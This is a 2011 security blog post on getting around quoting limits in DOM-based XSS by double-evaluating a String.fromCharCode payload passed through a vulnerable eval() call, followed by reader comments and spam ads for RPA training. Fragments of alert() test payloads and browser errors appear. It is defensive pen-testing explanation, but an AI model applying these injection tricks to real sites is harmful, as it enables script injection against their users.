Friday, December 02, 2011

Double eval() for DOM based XSS

DOM based XSS are becoming relatively common with Web 2.0 and Ajax driven applications. DOM based applications are using eval() method to inject new stream into the existing DOM. In certain cases it is becoming tricky to pass on the values for pen-testing and to create an abuse/exploit scenario. Recently during consulting we came across different DOM based XSS and objective is to get a pop-up to confirm the vulnerability. If we get an eval call then it is possible to double eval-ing to convert text back into payload.

Here is a simple scenario; it can be complicated on case to case basis.
For example, we have following line in the code

eval('getProduct('+ koko.toString()+')');

Here “koko” is coming from URL or controlled by user. Hence, if we pass on the value in following URL it gets to the “getProduct” function.

Testing scenario is simple, it causes DOM based XSS with following condition.

We are passing payload terminating function, ending statement and commenting out rest of the script. We get a simple pop-up if we pass on following code.

But to prove a point if we want to craft any other payload where we need to send single quote, for example want to execute “document.getElementsByName('Login')” will not work since we have that single quote that will raise syntax error. For simplicity if we pass on alert(‘hi’), it will not work and we will not get popup in above scenario.

We get following error in the browser.

Error: syntax error
Source File:;elval(alert(%27hi%27));//
Line: 37, Column: 29
Source Code:

Interestingly, we can leverage double eval() in this case, we pass on following payload and let’s see what happens…

It will avoid error and we will get a pop-up. What we did was simple, we used fromCharCode function and passed on decimal values for alert(‘hi’) here, first eval will convert it into string and second eval will execute the code. Hence, double eval can rescue while testing DOM based XSS.

Curiously I searched this trick on web if people are using it and came across this article -
Double eval() can be leveraged for string operations and concatenation.


Jeremy said...

Wouldn't escaping the single tick work too? As in:;alert(\'test\');//

shreeraj said...

Nop. It will not work - going through URL browser will not process. It may work through POST params.

Error: illegal character
Source File:;alert(\%27hi\%27)//
Line: 37, Column: 23
Source Code:

digi mark said...

This is most informative and also this post most user friendly and super navigation to all posts... Thank you so much for giving this information to me.. 

automation anywhere training in chennai

automation anywhere training in bangalore

automation anywhere training in pune

automation anywhere online training

blueprism online training

rpa Training in sholinganallur

rpa Training in annanagar




sathyaramesh said...

I am really enjoyed a lot when reading your well-written posts. It shows like you spend more effort and time to write this blog. I have saved it for my future reference. Keep it up the good work.
RPA Training in Chennai
RPA Training Institute in Chennai
Robotic Process Automation Training
Robotics courses in bangalore
RPA classes in bangalore